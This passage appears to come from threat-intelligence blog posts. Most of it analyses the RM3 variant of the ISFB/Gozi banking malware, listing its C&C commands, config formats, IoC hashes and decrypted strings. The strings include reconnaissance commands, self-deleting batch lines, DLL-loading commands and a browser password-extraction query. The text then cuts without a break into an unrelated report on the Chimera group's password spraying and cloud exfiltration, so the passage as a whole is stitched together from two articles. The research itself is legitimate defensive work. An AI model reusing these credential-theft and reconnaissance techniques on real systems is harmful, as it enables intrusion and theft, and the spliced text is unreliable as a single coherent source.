856b0d0_14 | bl!Aplib
856b0d0_15 | bl!ReadSubKey 
856b0d0_16 | bl!WriteSubKey 
856b0d0_17 | bl!CreateProcessA
856b0d0_18 | bl!CreateProcessW
856b0d0_19 | bl!GetRM3MainSubkey
856b0d0_20 | bl!LoadModule
856b0d0_21 | bl!???
856b0d0_22 | bl!OpenProcess 
856b0d0_23 | bl!InjectDLL
856b0d0_24 | bl!ReturnInstructionPointer
856b0d0_25 | bl!GetPRNGValue
856b0d0_26 | bl!CheckRSA
856b0d0_27 | bl!Serpent
856b0d0_28 | bl!SearchConfigFile
856b0d0_29 | bl!???
856b0d0_30 | bl!ResolveFunction01
856b0d0_31 | bl!GetFunctionByIndex
856b0d0_32 | bl!HookFunction
856b0d0_33 | bl!???
856b0d0_34 | bl!ResolveFunction02
856b0d0_35 | bl!???
856b0d0_36 | bl!GetExplorerPID
856b0d0_37 | bl!PsSupSetWow64Redirection
856b0d0_40 | bl!MainRWFile
856b0d0_42 | bl!PipeSendCommand
856b0d0_43 | bl!PipeMainRWFile
856b0d0_44 | bl!WriteFile 
856b0d0_45 | bl!ReadFile
856b0d0_50 | bl!RebootBlModule
856b0d0_51 | bl!LdrFindEntryForAddress
856b0d0_52 | bl!???
856b0d0_55 | bl!SetEAXToZero
856b0d0_56 | bl!LdrRegisterDllNotification
856b0d0_57 | bl!LdrUnegisterDllNotification
856b0d0_59 | bl!FillGuidName
856b0d0_60 | bl!GenerateRandomSubkeyName
856b0d0_61 | bl!InjectDLLToSpecificPID
856b0d0_62 | bl!???
856b0d0_63 | bl!???
856b0d0_65 | bl!???
856b0d0_70 | bl!ReturnOne             
856b0d0_71 | bl!AppAlloc
856b0d0_72 | bl!AppFree
856b0d0_73 | bl!MemAlloc
856b0d0_74 | bl!MemFree
856b0d0_75 | bl!CsDecryptSection  (Decrypt bss, real name from isfb leak source code)
856b0d0_76 | bl!CreateThread
856b0d0_78 | bl!GrabDataFromRegistry
856b0d0_79 | bl!Purge
856b0d0_80 | bl!RSA

explorer.dll – the RM3 mastermind

Explorer.dll could be regarded as the opposite of the background loader. It is designed to manage all interactions of this banking malware, at any level:

  • Checking timeout timers that could lead to drastic changes in RM3 operations
  • Allowing and executing all tasks that RM3 is able to perform
  • Starting fundamental grabbing features
  • Download and update modules and configs
  • Launch modules
  • Modifying RM3 URIs dynamically
An overview of the RM3 explorer.dll module

In the task manager worker, the workaround looks like the following:

RM3 task manager implemented in explorer.dll

Interestingly, the RM3 developers abuse their own hash system (JAMCRC32) by shuffling hashes into very large amounts of conditions. By doing this, they create an ecosystem that is seemingly unique to each build. Because of this, it feels a major update has been performed on an RM3 module although technically it is just another anti-disassembly trick for greatly slowing down any in-depth analysis. On the other hand, this task manager is a gold mine for understanding how all the interactions between bots and the C&C are performed and how to filter them into multiple categories.

General command

General commands

CRC Command Description
0xdf43cd90CRASHGenerate and send a crash report
0x274323e2RESTARTRestart RM3
0xce54bcf5REBOOTReboot system

Recording

CRC Command Description
0x746ce763VIDEOStart desktop recording of the victim machine
0x8de92b0dSETVIDEOVIDEO pivot condition
0x54a7c26cSET_VIDEOPreparing desktop recording

Updates

CRC Command Description
0xb82d4140UPDATE_ALLForcing update for all module
0x4f278846LOAD_UPDATELoad & Execute and updated PX module

Tasks

CRC Command Description
0xaaa425c4USETASKKEYUse task.bin pubkey for decrypting upcoming tasks

Timeout settings

CRC Command Description
0x955879a6SENDTIMEOUTTimeout timer for receiving commands
0xd7a003c9CONFIGTIMEOUTTimeout timer for receiving inject config updates
0x7d30ee46INITIMEOUTTimeout timer for receiving INI config update
0x11271c7fIDLEPERIODTimeout timer for bot inactivity
0x584e5925HOSTSHIFTTIMEOUTTimeout timer for switching C&C domain list
0x9dd1ccafSTANDBYTIMEOUTTimeout timer for switching primary C&C’s to Stand by ones
0x9957591RUNCHECKTIMEOUTTimeout timer for checking & run RM3 autorun
0x31277bd5TASKTIMEOUTTimeout timer for receiving a task request

Clearing

CRC Command Description
0xe3289ecbCLEARCACHECLR_CACHE pivot condition
0xb9781fc7CLR_CACHEClear all browser cache
0xa23fff87CLR_LOGSClear all RM3 logs currently stored
0x213e71beDEL_CONFIGRemove requested RM3 inject config

HTTP

CRC Command Description
0x754c3c76LOGHTTPIntercept & log POST HTTP communication
0x6c451cb6REMOVECSPRemove CSP headers from HTTP
0x97da04deMAXPOSTLENGTHClear all RM3 logs currently stored

Process execution

CRC Command Description
0x73d425ffNEWPROCESSInitialising RM3 routine

Backup

CRC Command Description
0x5e822676STANDBYCase condition if primary servers are not responding for X minutes

Data gathering

CRC Command Description
0x864b1e44GET_CREDSCollect credentials
0xdf794b64GET_FILESCollect files (grabber module)
0x2a77637aGET_SYSINFOCollect system information data

Main tasks

CRC Command Description
0x3889242LOAD_CONFIGDownload and Load a requested config with specific arguments
0xdf794b64GET_FILESDownload a DLL from a specific URL and load it into explorer.exe
0xae30e778LOAD_EXEDownload an executable from a specific URL and load it
0xb204e7e0LOAD_INIDownload and load an INI file from a specific URL
0xea0f4d48LOAD_CMDLoad and Execute Shell module
0x6d1ef2c6LOAD_FTPLoad and Execute FTP module with specific arguments
0x336845f8LOAD_KEYLOGLoad and Execute keylog module with specific arguments
0xdb269b16LOAD_MODULELoad and Execute RM3 PX Module with specific arguments
0x1e84cd23LOAD_SOCKSLoad and Execute socks module with specific arguments
0x45abeab3LOAD_VNCLoad and Execute VNC module with specific arguments

Shell command

CRC Command Description
0xb88d3fdfRUN_CMDExecute specific command and send the output to the C&C

URI setup

CRC Command Description
0x9c3c1432SET_URIChange the URI path of the request

File storage

CRC Command Description
0xd8829500STORE_GRABSave grabber content into temporary file
0x250de123STORE_KEYLOGSave keylog content into temporary file
0x863ecf42STORE_MAILSave stolen mail credentials into temporary file
0x9b587bc4STORE_HTTPLOGSave stolen http interceptions into temporary file
0x36e4e464STORE_ACCSave stolen credentials into temporary file

Timeout system

With its timeout values stored into its rm3_struct, explorer.dll is able to manage every possible worker task launched and monitor them. Then, whenever one of the timers reaches the specified value, it can modify the behaviour of the malware (in most cases, avoiding unnecessary requests that could create noise and so increase the chances of detection).

COM Objects being inspected for possible timeout

Backup controllers

In the same way, explorer.dll also provides additional controllers which are called ‘stand by’ domains. The idea behind this is that, when principal controller C&Cs don’t respond, a module can automatically switch to this preset list. Those new domains are stored in explorer.ini.

{
    "STANDBY": "standbydns1.tld","standbydns2.tld"  
    "STANDBYTIMEOUT": "60"                   // Timeout in minutes
}

In the example above, if the primary domain C&Cs did not respond after one hour, the request would automatically switch to the standby C&Cs.

Desktop recording and RM3 – An ingenious way to check bots

Rarely mentioned in the wild but actively used by TAs, RM3 is also able to record bot interactions. The video setup is stored in the client.ini file, which the bot receives from the controller domain.

"SETVIDEO": [
        "30,",     // 30 seconds
        "8,",      // 8 Level quality (min:1 - max:10)
        "notipda"  // Process name list    
],

Behind “SETVIDEO”, only 3 values are required to setup video recording:

RM3 AVI recording setup

After being initialised, the task waits its turn to be launched. It can be triggered to work in multiple ways:

  • Detecting the use of specific keywords in a Windows process
  • Using RM3’s increased debugging telemetry to detect if something is crashing, either in the banking malware itself or in a deployed injects (although the ability to detect crashes in an inject is only hypothetical and has not been observed)
  • Recording user interactions with a bank account; the ability to record video is a relatively new but killer move on the part of the malware developers allowing them to check legitimate bots and get injects

The ability to record video depends only on “@VIDEO=” being cached by the browser module. It is not primarily seen at first glance when examining the config, but likely inside external injects parts.

@ ISFB Code leak
Вкладка Video - запись видео с экрана

Opcode = "VIDEO"
Url - задает шаблон URL страницы, для которой необходмо сделать запись видео с экрана
Target - (опционально) задает ключевое слово, при наличии которого в коде страницы будет сделана запись
Var - задаёт длительность записи в секундах
RM3 browser webinject module detecting if it needs to launch a recording session (or any other particular task).

RM3 and its remote shell module – a trump card for ransomware gangs

Banking malware having its own remote shell module changes the potential impact of infecting a corporate network drastically. This shell is completely custom to the malware and is specially designed. It is also significantly less detectable than other tools currently seen for starting lateral movement attacks due to its rarity. The combination of potentially much greater impact and lower detectability make this piece of code a trump card, particularly as they now look to migrate to a ransomware model.

Called cmdshell, this module isn’t exclusive to RM3 but has in fact, been part of ISFB since at least build v2.15. It has likely been of interest for TA groups in fields less focused on fraud since then. The inclusion of a remote shell obviously greatly increases the flexibility this malware family provides to its operators; but also, of course, makes it harder to ascertain the exact purpose of any one infection, or the motivation of its operators.

Cmdshell module being launched by the RM3 Task Manager

After being executed by the task command “LOAD_CMD”, the injected module installs a persistent remote shell which a TA can use to perform any kind of command they want.

RM3 cmdshell module creating the remote shell

As noted above, the inclusion of a shell gives great flexibility, but can certainly facilitate the work of at least two types of TA:

  • Fraudsters (if the VNC/SOCKS module isn’t working well, perhaps)
  • Malicious Red teams affiliated with ransomware gangs

It’s worth noting that this remote shell should not be confused with the RUN_CMD command. The RUN_CMD is used to instruct a bot to execute a simple command with the output saved and sent to the Controllers. It is also present as a simple condition:

RUN_CMD inside the RM3 Task Manager

Then following a standard I/O interaction:

Executing task in cmd console and saving results into an archive

But both RM3’s remote shell and the RUN_CMD can be an entry point for pushing other specialised tools like Cobalt Strike, Mimikatz or just simple PowerShell scripts. With this kind of flexibility, the main limitation on the impact of this malware is any given TA’s level of skill and their imagination.

Task.key – a new weapon in RM3’s encryption paranoia

Implemented sometime around Q2 2020, RM3 decided to add an additional layer of protection in its network communications by updating the RSA public key used to encrypt communications between bot and controller domains.

They designed a pivot condition (USETASKKEY) that decides which RSA.KEY and TASK.KEY will be used for decrypting the content from the C&C depending of the command/content received. We believed this choice has been developed for breaking researcher for emulating RM3 traffic.

Extra condition with USETASKKEY to avoid using the wrong RSA pubkey

RM3 – A banking malware designed to debug itself

As we’ve already noted, RM3 represents a significant step change from previous versions of ISFB. These changes extend from major architecture changes down to detailed functional changes and so can be expected to have involved considerable development and probably testing effort, as well. Whether or not the malware developers found the troubleshooting for the RM3 variant more difficult than previously, they also took the opportunity to include a troubleshooting feature. If RM3 experiences any issues, it is designed to dump the relevant process and send a report to the C&C. It’s expected that this would then be reported to the malware developers and so may explain why we now see new builds appearing in the wild rather faster than we have previously.

The task is initialised at the beginning of the explorer module startup with a simple workaround:

  • Address of the MiniDumpWritDump function from dbghelp.dll is stored
  • The path of the temporary dump file is stored in C://tmp/rm3.dmp
  • All these values are stored into a designed function and saved into the RM3 master struct
Crash dump being initialized and stored into the RM3 global structure

With everything now configured, RM3 is ready for two possible scenarios:

  • Voluntarily crashing itself with the command ‘CRASH’
  • Something goes wrong and so a specific classic error code triggers the function
RM3 executing the crash dump routine

Stolen Data – The (old) gold mine

Gathering interesting bots is a skill that most banking malware TAs have decent experience with after years of fraud. And nowadays, with the ransomware market exploding, this expertise probably also permits them to affiliate more easily with ransom crews (or even to have exclusivity in some cases).

In general, ISFB (v2 and v3) is a perfect playground as it can be used as a loader with more advanced telemetry than classic info-stealers. For example, Vidar, Taurus or Raccoon Stealer can’t compete at this level. This is because the way they are designed to work as a one-shot process (and be removed from the machine immediately afterwards) makes them much less competitive than the more advanced and flexible ISFB. Of course, in any given situation, this does not necessarily mean they are less important than banking malware. And we should keep in mind the fact that the Revil gang bought the source code for the Kpot stealer and it is likely this was so they could develop their own loader/stealer.

RM3 can be split into three main parts in terms of the grabber:

  • Files/folders
  • Browser credential harvesting
  • Mail
An overview of standard stealing feature developed by RM3

It’s worth noting that the mail module is an underrated feature that can provide a huge amount of information to a TA:

  • Many users store nearly everything in their email (including passwords and sensitive documents)
  • Mails can be stolen and resold to spammers for crafting legitimate mails with malicious attachments/links

Stealing/intercepting HTTP and HTTPS communication

RM3 implements an SSL Proxy and so is really effective at intercepting POST requests performed by the user. All of them are stored and sent every X minutes to the controllers.

RM3 browser module initializing the SSL proxy interception
RM3 SSL Proxy running on MsEdge

Whenever the user visits a website, part of the inject config will automatically replace strings or variables in the code (‘base’) with the new content (‘new_var’); this often includes a URL path from an inject C&C.

As if that wasn’t complicated enough, most of them are geofencedand it could be possible they manually allow the bot to get them (especially with the elite one). Indeed, this is another trick for avoiding analysts and researchers to get and report those scripts  that cost millions to financial companies.

A typical inject entry in config.bin

A parser then modifies the variable ‘@ID@ and ‘@GROUP@’ to the correct values as stored in RM3_Struct and other structures relevant to the browsers.dll module.

Browser inject module parsing config.bin and replacing with respective botid and groupid

System information gathering

Gathering system information is simple with RM3:

  • Manually (using a specific RUN_CMD command)
  • Requesting info from a bot with GET_SYSINFO

Indeed, GET_SYSINFO is known and regularly used by ISFB actors (both active strains)

systeminfo.exe
driverquery.exe
net view
nslookup 127.0.0.1
whoami /all
net localgroup administrators
net group "domain computers" /domain

TAs in general are spending a lot of time (or are literally paying people) to inspect bots for the stolen data they have gathered. In this regard, bots can be split into one of the following groups:

  • Home bots (personal accounts)
  • Researcher bots
  • Corporate bots (compromised host from a company)

Over the past 6 months, ISFB v2 has been seen to be extremely active in term of updates. One purpose of these updates has been to help TAs filter their bots from the loader side directly and more easily. This filtering is not a new thing at all, but it is probably of more interest (and could have a greater impact) for malicious operations these days. 

Microsoft Edge (Chromium) joining the targeted browser list

One critical aspect of any banking malware is the ability to hook into a browser so as to inject fakes and replacers in financial institution websites.

At the same time as the Task.key implementation, RM3 decided to implement a new browser in its targeted list: “MsEdge”. This was not random, but was a development choice driven by the sheer number of corporate computers migrating from Internet Explorer to Edge.

RM3 MsEdge startup module

This means that 5 browsers are currently targeted:

  • Internet Explorer
  • Microsoft Edge (Original)
  • Microsoft Edge (Chromium)
  • Mozilla Firefox
  • Google Chrome

Currently, RM3 doesn’t seem to interact with Opera. Given Opera’s low user share and almost non-existent corporate presence, it is not expected that the development of a new module/feature for Opera would have an ROI that was sufficiently attractive to the TAs and RM3 developers. Any development and debugging would be time consuming and could delay useful updates to existing modules already producing a reliable return.

RM3 and its homemade forked SQLITE module

A lot of this blogpost has been dedicated to discussing the innovative design and features in RM3. But perhaps the best example of the attention to detail displayed in the design and development of this malware is the custom SQLITE3 module that is included with RM3. Presumably driven by the need to extract credentials data from browsers (and related tasks), they have forked the original SQLite3 source code and refactored it to work in RM3.

Using SQLite is not a new thing, of course, as it was already noted in the ISFB leak.

Interestingly, the RM3 build is based on the original 3.8.6 build and has all the features and functions of the original version.

Because the background loader (bl.dll) is the only module within RM3 technically capable of performing allocation operations, they have simply integrated “free”, “malloc”, and “realloc” API calls with this backbone module.

What’s new with Build 300960?

Goodbye Serpent, Hello AES!

Around mid-march, RM3 pushed a major update by replacing the Serpent encryption with the good old AES 128 CBC. All locations where Serpent encryption was used, have been totally reworked so as to work with AES.

AES 128 CBC implementation in RM3

RM3 C&C response also reviewed

Before build 300960, RM3 treated data received from controllers as described below. Information was split into two encrypted parts (a header and a body) which are treated differently:

  1. The encrypted head was decrypted with the public RSA key extracted from modules, to extract a Serpent key
  2. This Serpent key was then used to decrypt the encrypted data in the body (this is a different key from client.ini and loader.ini).

This was the setup before build 300960:

Now, in the recently released 300960 build, with Serpent removed and AES implemented instead, the structure of the encrypted header has changed as indicated below:

The decrypted body data produced by this process is not in an entirely standard format. In fact, it’s compressed with the APlib library. But removing the first 0x14 bytes (or sometimes 0x4 bytes) and decompressing it, ensures that the final block is ready for analysis.

  • If it’s a DLL, it will be recognised with the PX format
  • If it’s web injects, it’s an archive that contains .sig files (that is, MAIN.SIG†)
  • If it’s tasks or config updates, these are in a classic raw ISFB config format

† SIG can probably be taken to mean ‘signature’

Changes in .ini files

Two fields have been added in the latest campaigns. Interestingly, these are not new RM3 features but old ones that have been present for quite some time.

{
    "SENDFGKEY": "0",    // Send Foreground Key
    "SUBDOMAINS": "0",   
}

Appendix

IoCs – Campaign

00cd7319a42bbabd0c81a7e9817d2d5071738d5ac36b98b8ff9d7383c3d7e1ba - DE
a7007821b1acbf36ca18cb2ec7d36f388953fe8985589f170be5117548a55c57 - Italy
5ee51dfd1eb41cb6ce8451424540c817dbd804f103229f3ae1b645b320cbb4e8 - Australia/NZ 1
c7552fe5ed044011aa09aebd5769b2b9f3df0faa8adaab42ef3bfff35f5190aa - Australia/NZ 2
261c6f7b7e9d8fc808a4a9db587294202872b2a816b2b98516551949165486c8 - UK 1
2e0b219c5ac3285a08e126f11c07ea3ac60bc96d16d37c2dc24dd8f68c492a74 - UK 2
6818b6b32cb91754fd625e9416e1bc83caac1927148daaa3edaed51a9d04e864 - Worldwide ?

86b670d81a26ea394f7c0edebdc93e8f9bd6ce6e0a8d650e32a0fe36c93f0dee - GoziAT/ISFB RM2

IoCs – Modules

b15c3b93f8de40b745eb1c1df5dcdee3371ba08a1a124c7f20897f87f23bcd55  loader.exe (Build 300932)
ce4fc5dcab919ea40e7915646a3ce345a39a3f81c33758f1ba9c1eae577a5c35  loader.dll (Build 300932)

ba0e9cb3bf25516e2c1f0288e988bd7bd538d275373d36cee28c34dafa7bbd1f  explorer.dll (Build 300932)
accb76e6190358760044d4708e214e546f87b1e644f7e411ba1a67900bcd32a1  bl.dll (Build 300932)
f90ed3d7c437673c3cfa3db8e6fbb3370584914def2c0c2ce1f11f90f199fb4f  ntwrk.dll (Build 300932)
38c9aff9736eae6db5b0d9456ad13d1632b134d654c037fba43086b5816acd58  rt.dll (Build 300932)

2c7cdcf0f9c2930096a561ac6f9c353388a06c339f27f70696d0006687acad5b  browser.dll (Build 300932)
34517a7c78dd66326d0d8fbb2d1524592bbbedb8ed6b595281f7bb3d6a39bc0a  chrome.dll (Build 300932)
59670730341477b0a254ddbfc10df6f1fcd3471a08c0d8ec20e1aa0c560ddee4  firefox.dll (Build 300932)
d927f8793f537b94c6d2299f86fe36e3f751c94edca5cd3ddcdbd65d9143b2b6  iexplorer.dll (Build 300932)
199caec535d640c400d3c6b35806c74912b832ff78cb31fd90fe4712ed194b09  microsoftedgecp.dll (Build 300932)
13635b2582a11e658ab0b959611590005b81178365c12062e77274db1d0b4f0c  msedge.dll (Build 300932)

65a1923e037bce4816ac2654c242921f3e3592e972495945849f155ca69c05e5  loader.dll (Build 300960)

d1f5ef94e14488bf909057e4a0d081ff18dd0ac86f53c42f53b12ea25cdcfe76  cmdshell.dll (Build 300869)
820faca1f9e6e291240e97e5768030e1574b60862d5fce7f6ba519aaa3dbe880  vnc.dll (Build 300869)

Shellcode – startup module – bss decrypted

Windows Security
NTDLL.DLL
RtlExitUserProcess
KERNEL32.DLL
bl.dll - bss decrypted
Microsoft Windows
KERNEL32.DLL
ADVAPI32.DLL
NTDLL.DLL
KERNELBASE
USER32
LdrUnregisterDllNotification
ResolveDelayLoadsFromDll
Software
Wow64EnableWow64FsRedirection
\REGISTRY\USER\%s\%s\
{%08X-%04X-%04X-%04X-%08X%04X}
SetThreadInformation
GetWindowThreadProcessId
%08X-%04X-%04X-%04X-%08X%04X
RtlExitUserThread
S-%u-%u
-%u
Local\
\\.\pipe\
%05u
LdrRegisterDllNotification
NtClose
ZwProtectVirtualMemory
LdrGetProcedureAddress
WaitNamedPipeW
CallNamedPipeW
LdrLoadDll
NtCreateUserProcess
.dll
%08x
GetShellWindow
\KnownDlls\ntdll.dll
%systemroot%\system32\c_1252.NLS
\??\
\\?\

explorer.dll – bss decrypted

indows Security
.jpeg
Main
.gif
.bmp
%APPDATA%\Microsoft\
tasklist.exe /SVC
\Microsoft\Windows\
cmd /C "%s" >> %S0
systeminfo.exe
driverquery.exe
net view
nslookup 127.0.0.1
whoami /all
net localgroup administrators
net group "domain computers" /domain
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
cmd /U /C "type %S0 > %S & del %S0"
echo -------- %u
KERNELBASE
.exe
RegGetValueW
0x%S
.DLL
DllRegisterServer
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Serialize
0x%X,%c%c
Startupdelayinmsec
ICGetInfo
SOFTWARE\Classes\Chrome
DelegateExecute
\\?\
%userprofile%\appdata\local\google\chrome\user data\default\cache
\Software\Microsoft\Windows\CurrentVersion\Run
http\shell\open\command
ICSendMessage
%08x
 | "%s" | %u
msvfw32
ICOpen
ICClose
ICInfo
main
%userprofile%\AppData\Local\Mozilla\Firefox\Profiles
.avi
https://
Video: sec=%u, fps=%u, q=%u
Local\
%userprofile%\appdata\local\microsoft\edge\user data\default\cache
MiniDumpWriteDump
cache2\entries\*.*
%PROGRAMFILES%\Mozilla Firefox
%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*
Software\Classes\CLSID\%s\InProcServer32
open
http://
file://
DBGHELP.DLL
%temp%\rm3.dmp
%u, 0x%x, "%S"
"%S", 0x%p, 0x%x
%APPDATA%
SOFTWARE\Microsoft\Windows NT\CurrentVersion
InstallDate

rt.dll – bss decrypted

Windows Security
%s%02u:%02u:%02u 
:%u
attrib -h -r -s %%1
del %%1
if exist %%1 goto %u
del %%0
Low\
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
*.*
.bin
open
%02u-%02u-%02u %02u:%02u:%02u
*.dll
%systemroot%\system32\c_1252.NLS
rundll32 "%s",%S %s
"%s"
cmd /C regsvr32 "%s"
Mb=Lk
Author
n;
QkkXa
M<q

netwrk.dll – bss decrypted

&WP
POST
Host
%04x%04x
GET
Windows Security
Content-Type: multipart/form-data; boundary=%s
Content-Type: application/octet-stream
--%s
--%s--
%c%02X
https://
http://
%08x%08x%08x%08x
form
%s=%s&
/images/
.bmp
file://
type=%u&soft=%u&version=%u&user=%08x%08x%08x%08x&group=%u&id=%08x&arc=%u&crc=%08x&size=%u&uptime=%u
index.html
Content-Disposition: form-data; name="%s"
; filename="%s"
&os=%u.%u_%u_%u_x%u
&ip=%s
Mozilla/5.0 (Windows NT %u.%u%s; Trident/7.0; rv:11.0) like Gecko
; Win64; x64
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
%08x
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
F%D,3
overridelink
invalidcert
9*.onion
&sysid=%08x%08x%08x%08x

browser.dll – bss decrypted

%c%02X
.php
Windows Security
1.3.6.1.5.5.7.3.2
1.3.6.1.5.5.7.3.1
2.5.29.15
2.5.29.37
2.5.29.1
2.5.29.35
2.5.29.14
2.5.29.10
2.5.29.19
1.3.6.1.5.5.7.1.1
2.5.29.32
1.3.6.1.5.5.7.1.11
1.3.6.1.5.5.7
1.3.6.1.5.5.7.1
2.5.29.31
1.2.840.113549.1.1.11
1.2.840.113549.1.1.5
WS2_32.dll
iexplore.hlp
ConnectEx
Local\
WSOCK32.DLL
WININET.DLL
CRYPT32.DLL
socket
connect
closesocket
getpeername
WSAStartup
WSACleanup
WSAIoctl
User-Agent
Content-Type
Content-Length
Connection
Content-Security-Policy
Content-Security-Policy-Report-Only
X-Frame-Options
Access-Control-Allow-Origin
chunked
WebSocket
Transfer-Encoding
Content-Encoding
Accept-Encoding
Accept-Language
Cookie
identity
gzip, deflate
gzip
Host
://
HTTP/1.1 404 Not Found
Content-Length: 0
://
HTTP/1.1 503 Service Unavailable
Content-Length: 0
http://
https://
Referer
Upgrade
Cache-Control
Last-Modified
Etag
no-cache, no-store, must-revalidate
ocsp
TEXT HTML JSON JAVASCRIPT
SECUR32.DLL
SECURITY.DLL
InitSecurityInterfaceW
BUNNY
SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
SendTrustedIssuerList
@ID@
URL=
Main
@RANDSTR@
Blocked
@GROUP@
BLOCKCFG=
LOADCFG=
DELCFG=
VIDEO=
VNC=
SOCKS=
CFGON=
CFGOFF=
ENCRYPT=
http
@%s@
http
grabs=
POST
PUT
GET
HEAD
OPTIONS
URL: %s
REF: %s
LANG: %s
AGENT: %s
COOKIE: %s
POST: 
USER: %s
USERID: %s
@*@
***
IE:
:Microsoft Unified Security Protocol Provider
FF:
CR:
ED:
iexplore
firefox
chrome
edge
InitRecv %u, %s%s
CompleteRecv %u, %s%s
LoadUrl %u, %s
NEWGRAB
CertGetCertificateChain
CertVerifyCertificateChainPolicy
NSS_Init
NSS_Shutdown
nss3.dll
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_Authenticate
PK11SDR_Decrypt
hostname
vaultcli
%PROGRAMFILES%\Mozilla Thunderbird
encryptedUsername
%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
encryptedPassword
logins.json
%systemroot%\syswow64\svchost.exe
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
FindCloseUrlCache
VaultEnumerateItems
type=%s, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
DeleteUrlCacheEntryW
VaultEnumerateVaults
VaultOpenVault
VaultCloseVault
VaultFree
VaultGetItem
c:\test\sqlite3.dll
SELECT origin_url, username_value, password_value FROM logins
encrypted_key":"
default\login data
BCryptSetProperty
%userprofile%\appdata\local\google\chrome\user data
local state
DPAPI
v10
BCryptDecrypt
AES
Microsoft Primitive Provider
BCryptDestroyKey
BCryptCloseAlgorithmProvider
ChainingModeGCM
BCryptOpenAlgorithmProvider
BCryptGenerateSymmetricKey
BCRYPT
%userprofile%\appData\local\microsoft\edge\user data

Abusing cloud services to fly under the radar

tl;dr

NCC Group and Fox-IT have been tracking a threat group with a wide set of interests, from intellectual property (IP) from victims in the semiconductors industry through to passenger data from the airline industry.

In their intrusions they regularly abuse cloud services from Google and Microsoft to achieve their goals. NCC Group and Fox-IT observed this threat actor during various incident response engagements performed between October 2019 until April 2020. Our threat intelligence analysts noticed clear overlap between the various cases in infrastructure and capabilities, and as a result we assess with moderate confidence that one group was carrying out the intrusions across multiple victims operating in Chinese interests.

In open source this actor is referred to as Chimera by CyCraft.

NCC Group and Fox-IT have seen this actor remain undetected, their dwell time, for up to three years. As such, if you were a victim, they might still be active in your network looking for your most recent crown jewels.

We contained and eradicated the threat from our client’s networks during incident response whilst our Managed Detection and Response (MDR) clients automatically received detection logic.

With this publication, NCC Group and Fox-IT aim to provide the wider community with information and intelligence that can be used to hunt for this threat in historic data and improve detections for intrusions by this intrusion set.

Throughout we use terminology to describe the various phases, tactics, and techniques of the intrusions standardized by MITRE with their ATT&CK framework . Near the end of this article all the tactics and techniques used by the adversary are listed with links to the MITRE website with more information.

From initial access to defense evasion: how it is done

In all the intrusions we have observed they are performed in similar ways by the adversary: from initial access all the way to actions on objectives. The objective in these cases appear to be stealing sensitive data from the victim’s networks.

Credential theft and password spraying to Cobalt Strike

This adversary starts with obtaining usernames and passwords of their victim from previous breaches. These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control.

Network discovery and lateral movement

The adversary continues their discovery of the victim’s network from patient zero. Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already member of the domain admins group, the first lateral move in the network is usually to a domain controller where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. After this the adversary dumps the domain admin credentials from the memory of this machine, continues lateral moving through the network, and places Cobalt Strike beacons on servers for increased persistent access into the victim’s network. If the victim’s network contains other Windows domains or different network security zones, the adversary scans and finds the trust relationships and jump hosts, attempting to move into the other domains and security zones. The adversary is typically able to perform all the steps described above within one day.

During this process, the adversary identifies data of interest from the network of the victim. This can be anything from file and directory-listings, configuration files, manuals, email stores in the guise of OST- and PST-files, file shares with intellectual property (IP), and personally identifiable information (PII) scraped from memory. If the data is small enough, it is exfiltrated through the command and control channel of the Cobalt Strike beacons. However, usually the data is compressed with WinRAR, staged on another system of the victim, and from there copied to a OneDrive-account controlled by the adversary.

After the adversary completes their initial exfiltration, they return every few weeks to check for new data of interest and user accounts. At times they have been observed attempting to perform a degree of anti-forensic activities including clearing event logs, time stomping files, and removing scheduled tasks created for some objectives. But this isn’t done consistently across their engagements.

Framing the adversary’s work in the MITRE ATT&CK framework

Credential access (TA0006)

The earliest and longest lasting intrusion by this threat we observed, was at a company in the semiconductors industry in Europe and started early Q4 2017. The more recent intrusions took place in 2019 at companies in the aviation industry. The techniques used to achieve access at the companies in the aviation industry closely resembles techniques used at victims in the semiconductors industry.

The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g.<username>@<email domain>. While usernames for legitimate logins at the victim’s network were generally formatted like <domain>\<username>. And attempted logins came from a relative small set of IP-addresses.

For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying.

Initial access (TA0001)

In some of the intrusions the adversary used the valid account to directly login to a Citrix environment and continued their work from there.

In one specific case, the adversary now armed with the valid account, was able to access a document stored in SharePoint Online, part of Microsoft Office 365. This specific document described how to access the internet facing company portal and the web-based VPN client into the company network. Within an hour after grabbing this document, the adversary accessed the company portal with the valid account.

